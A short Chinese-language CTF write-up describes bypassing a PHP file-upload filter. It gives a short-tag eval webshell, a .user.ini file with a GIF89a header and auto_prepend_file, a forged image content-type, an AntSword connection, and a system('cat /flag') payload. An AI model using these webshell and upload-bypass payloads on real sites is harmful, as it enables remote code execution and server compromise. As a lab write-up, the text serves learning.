首先尝试直接在URL上修改看能否找到有用的东西,尝试1.php,index.php,phpinfo.php,flag.php都无果
再尝试基本的文件上传漏洞,发现content-type修改,双写,数据流,改后缀,修改字节标识都不能上传成功。
接着尝试配置文件。
尝试过程中发现,真正的图片能上传,但是直接上传带有一句话木马的1.jpg会出现问题,说明可能与 ‘ php ’ 字符串有关所以采用短标签绕过
所以写一句话木马<?=eval($_POST['1'])?>
但是发现直接上传.user.ini有问题,尝试对.user.ini修改
首先在文件头部加上GIF89a进行添加图片的文件头,写法如下:
GIF89a
auto_prepend_file=1.jpg
然后上传时候抓包,修改content-type为image/jpg
可以上传成功
再将带有短标签一句话木马的1.jpg文件头部进行同样的操作加上GIF89a
可以上传成功,按F12找到网络查看上传地址。
然后蚁剑连接,在目录中找到flag
也可以将1.jpg里面这么写:
GIF89a
<?=system('cat /flag');?>
访问/uploads/index.php能直接在网页中得出flag
以上参考了大佬们的wp,做了小总结。
如有错误,欢迎指正。